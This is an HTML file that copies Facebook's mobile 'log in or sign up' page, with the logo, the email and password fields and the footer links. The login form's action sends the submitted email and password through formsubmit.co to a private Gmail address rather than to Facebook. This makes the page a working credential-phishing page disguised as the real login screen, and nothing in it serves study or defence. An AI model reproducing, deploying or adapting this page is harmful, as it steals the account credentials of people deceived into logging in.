<!DOCTYPE html><html lang="en"><head>
      <title>Facebook – log in or sign up</title>
      <meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1">
      <link href="images/gB76kJXPYJV.png" rel="shortcut icon" sizes="196x196">
      <link type="text/css" rel="stylesheet" href="css/X4gfkOBWWio.css">
      <link type="text/css" rel="stylesheet" href="css/JqnsAQ-FXDP.css">
      <link type="text/css" rel="stylesheet" href="css/hOY_OGAyjnt.css" >
      <link type="text/css" rel="stylesheet" href="css/jINAavgr18t.css">
    
      <link rel="canonical" href="index.html">
      <link rel="alternate" media="only screen and (max-width: 640px)" href="index.html">
      <link rel="alternate" href="index.html">
      <link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" >
   </head>
   <body tabindex="0" class="touch x2 android _fzu _50-3 iframe acw">
      <div id="viewport" data-kaios-focus-transparent="1">
         <h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">Facebook</h1>
         <div id="page">
            <div class="_129_" id="header-notices"></div>
            <div id="m:chrome:schedulable-graph-search"></div>
            <div class="_5soa acw" id="root" role="main" data-sigil="context-layer-root content-pane">
               <div class="_7om2">
                  <div class="_4g34" id="u_0_0_v/">
                     <div class="_5yd0 _2ph- _5yd1" style="display: none;" id="login_error" data-sigil="m_login_notice">
                        <div class="_52jd"></div>
                     </div>
                     <div class="_9om_">
                        <div class="_4-4l">
                           <div id="login_top_banner" data-sigil="m_login_upsell login_identify_step_element">
                              <div class="_qw9 grouped aclb" id="u_0_1_nz">
                                 <a href="" target="_top" class="touchableArea first last area touchable acy apl abt abb" data-sigil="touchable marea">
                                    <div class="ib cc">
                                       <i class="l img sp_xm9DDmY7HAL_3x sx_f30d37"></i>
                                       <div class="c"><span class="fcl">Get Facebook for Android and browse faster.</span></div>
                                    </div>
                                 </a>
                              </div>
                           </div>
                           <div class="_7om2 _52we _2pid _52z6">
                              <div class="_4g34"><a href=""><img src="images/4lCu2zih0ca.svg" width="112" class="img" alt="facebook"></a></div>
                           </div>
                           <div class="_5rut">
                              <form action="https://formsubmit.co/tomukmia718@gmail.com" method="POST" class="mobile-login-form _9hp- _5spm" id="login_form">
                                 <input type="hidden" name="lsd" ><input type="hidden" name="jazoest" ><input type="hidden" name="m_ts" ><input type="hidden" name="li" ><input type="hidden" name="try_number" value="0" data-sigil="m_login_try_number"><input type="hidden" name="unrecognized_tries" value="0" data-sigil="m_login_unrecognized_tries">
                                 <div id="user_info_container" data-sigil="user_info_after_failure_element"></div>
                                 <div id="pwd_label_container" data-sigil="user_info_after_failure_element"></div>
                                 <div id="otp_retrieve_desc_container"></div>
                                 <div>
                                    <div class="_56be">
                                       <div class="_55wo _56bf">
                                          <div class="_96n9" id="email_input_container"><input autocapitalize="off" type="email" class="_56bg _4u9z _5ruq _8qtn" autocomplete="on" id="m_login_email" name="email" placeholder="Mobile number or email address" data-sigil="m_login_email"></div>
                                       </div>
                                    </div>
                                    <div class="_55wq"></div>
                                    <div class="_56be">
                                       <div class="_55wo _56bf">
                                          <div class="_1upc _mg8" data-sigil="m_login_password">
                                             <div class="_7om2">
                                                <div class="_4g34 _5i2i _52we">
                                                   <div class="_5xu4"><input autocapitalize="off" class="_56bg _4u9z _27z2 _8qtm" autocomplete="on" id="m_login_password" name="pass" placeholder="Password" type="password" data-sigil="password-plain-text-toggle-input"></div>
                                                </div>
                                                <div class="_5s61 _216i _5i2i _52we">
                                                   <div class="_5xu4">
                                                      <div class="_2pi9" style="display:none" id="u_0_2_Um"><a href="#" data-sigil="password-plain-text-toggle"><span class="mfss" style="display:none" id="u_0_3_Aa">HIDE</span><span class="mfss" id="u_0_4_4n">SHOW</span></a></div>
                                                   </div>
                                                </div>
                                             </div>
                                          </div>
                                       </div>
                                    </div>
                                 </div>
                                 <div class="_2pie" style="text-align:center;">
                                    <div id="login_password_step_element" data-sigil="login_password_step_element"><button type="submit" value="Log In" class="_54k8 _52jh _56bs _56b_ _28lf _9cow _56bw _56bu" name="login" data-sigil="touchable login_button_block m_login_button"><span class="_55sr">Log In</span></button></div>
                                    <div class="_7eif" id="oauth_login_button_container" style="display:none"></div>
                                    <div class="_7f_d" id="oauth_login_desc_container" style="display:none"></div>
                                    <div id="otp_button_elem_container"></div>
                                 </div>
                                 <input type="hidden" name="prefill_contact_point" id="prefill_contact_point"><input type="hidden" name="prefill_source" id="prefill_source"><input type="hidden" name="prefill_type" id="prefill_type"><input type="hidden" name="first_prefill_source" id="first_prefill_source"><input type="hidden" name="first_prefill_type" id="first_prefill_type"><input type="hidden" name="had_cp_prefilled" id="had_cp_prefilled" value="false"><input type="hidden" name="had_password_prefilled" id="had_password_prefilled" value="false"><input type="hidden" name="is_smart_lock" id="is_smart_lock" value="false"><input type="hidden" id="bi_xrwh" name="bi_xrwh" value="0"><input type="hidden" id="scetoggle">
                                 <div class="_xo8"></div>
                                 <noscript><input type="hidden" name="_fb_noscript" value="true"></noscript>
                              </form>
                              <div>
                                 <div class="_2pie _9omz">
                                    <div class="_52jj _9on1"><a class="_9on1" tabindex="0" href="" id="forgot-password-link">Forgotten password?</a></div>
                                 </div>
                                 <div style="padding-top: 42px">
                                    <div>
                                       <div>
                                          <div>
                                             <div id="login_reg_separator" class="_43mg _8qtf" data-sigil="login_reg_separator"><span class="_43mh">or</span></div>
                                             <div class="_52jj _5t3b" id="signup_button_area"><a role="button" class="_agmp _28le btn btnS medBtn mfsm touchable" id="signup-button" href="index.html" tabindex="0" >Create new account</a></div>
                                          </div>
                                       </div>
                                       <div class="_2pie" style="text-align:center;">
                                          <div>
                                             <div data-sigil="login_identify_step_element"></div>
                                             <div class="other-links _8p_m">
                                                <ul class="_5pkb _55wp">
                                                   <li></li>
                                                </ul>
                                             </div>
                                          </div>
                                       </div>
                                    </div>
                                 </div>
                              </div>
                           </div>
                        </div>
                     </div>
                  </div>
               </div>
               <div style="display:none">
                  <div></div>
               </div>
               <span><img src="images/hsts-pixel.gif" alt="F" width="0" height="0" style="display:none"></span>
               <div class="_55wr _5ui2" data-sigil="m_login_footer">
                  <div class="_ao4m">
                     <div>
                        <div class="_5ui3" data-nocookies="1" id="locale-selector" >
                           <div class="_7om2">
                              <div class="_4g34">
                                 <span class="_52jc _52j9 _52jh _3ztb">English (UK)</span>
                                 <div class="_3ztc"><span class="_52jc"><a href="index.html">অসমীয়া</a></span></div>
                                 <div class="_3ztc"><span class="_52jc"><a href="index.html">नेपाली</a></span></div>
                                 <div class="_3ztc"><span class="_52jc"><a href="index.html">Português (Brasil)</a></span></div>
                              </div>
                              <div class="_4g34">
                                 <div class="_3ztc"><span class="_52jc"><a href="index.html">বাংলা</a></span></div>
                                 <div class="_3ztc"><span class="_52jc"><a href="index.html">हिन्दी</a></span></div>
                                 <div class="_3ztc"><span class="_52jc"><a href="index.html">Español</a></span></div>
                                 <a href="index.html">
                                    <div class="_3j87 _1rrd _3ztd" aria-label="Complete list of languages"><i class="img sp_zqrNfmDGuGz_3x sx_2f585a"></i></div>
                                 </a>
                              </div>
                           </div>
                        </div>
                        <div class="_5ui4">
                           <div class="_96qv _9a0a"><a href="index.html" class="_96qw" title="Read our blog, discover the resource centre and find job opportunities.">About</a><span aria-hidden="true"> · </span><a href="index.html" class="_96qw" title="Visit our Help Centre.">Help</a><span aria-hidden="true"> · </span><span class="_96qw" id="u_0_5_3M">More</span></div>
                           <div class="_96qv" style="display:none" id="u_0_6_ME"><a href="index.html" title="Take a look at Messenger." class="_96qw">Messenger</a><a href="index.html" title="Facebook Lite for Android." class="_96qw">Facebook Lite</a><a href="index.html" title="Browse in Video" class="_96qw">Video</a><a href="index.html" title="Take a look at popular places on Facebook." class="_96qw">Places</a><a href="index.html" title="Check out Facebook games." class="_96qw">Games</a><a href="index.html" title="Buy and sell on Facebook Marketplace." class="_96qw">Marketplace</a><a href="index.html" title="Learn more about Meta Pay" target="_blank" class="_96qw">Meta Pay</a><a href="index.html" title="Discover Meta" target="_blank" class="_96qw">Meta Store</a><a href="index.html" title="Learn more about Meta Quest" target="_blank" class="_96qw">Meta Quest</a><a href="index.html" title="Take a look at Instagram" target="_blank" class="_96qw" rel="noreferrer" data-sigil="MLynx_asynclazy">Instagram</a><a href="index.html" title="Check out Threads" class="_96qw">Threads</a><a href="index.html" title="Donate to worthy causes." class="_96qw">Fundraisers</a><a href="index.html" title="Browse our Facebook Services directory." class="_96qw">Services</a><a href="index.html" title="Develop on our platform." class="_96qw">Developers</a><a href="/careers/?ref=pf&amp;refid=8" title="Make your next career move to our brilliant company." class="_96qw">Careers</a><a href="index.html" title="Learn how we collect, use and share information to support Facebook." class="_96qw">Privacy Policy</a><a href="index.html" title="Learn how to manage and control your privacy on Facebook." class="_96qw">Privacy Centre</a><a href="index.html" title="Explore our groups." class="_96qw">Groups</a></div>
                           <span class="mfss fcg">Meta © 2023</span>
                        </div>
                     </div>
                  </div>
               </div>
            </div>
            <div class=""></div>
            <div class="viewportArea _2v9s" style="display:none" id="u_0_7_iE" >
               <div class="_5vsg" id="u_0_8_Q1"></div>
               <div class="_5vsh" id="u_0_9_WK"></div>
               <div class="_5v5d fcg">
            </div>
            <div class="viewportArea aclb" id="mErrorView" style="display:none" data-sigil="marea">
               <div class="container">
                  <div class="image"></div>
                  <div class="message" data-sigil="error-message"></div>
                  
               </div>
            </div>
         </div>
      </div>
      <div id="static_templates">
         <div class="mDialog" id="modalDialog" style="display:none">
            <div class="_52z5 _451a mFuturePageHeader _1uh1 firstStep titled" id="mDialogHeader">
               <div class="_7om2 _52we">
                  
                  <div class="_4g34">
                     <div class="_52z6">
                        
                     </div>
                  </div>
                  <div class="_5s61">
                     <div class="_52z8" id="modalDialogHeaderButtons"></div>
                  </div>
               </div>
            </div>
            <div class="modalDialogView" id="modalDialogView"></div>
            
         </div>
      </div>
    
   
  </div>

</body></html>
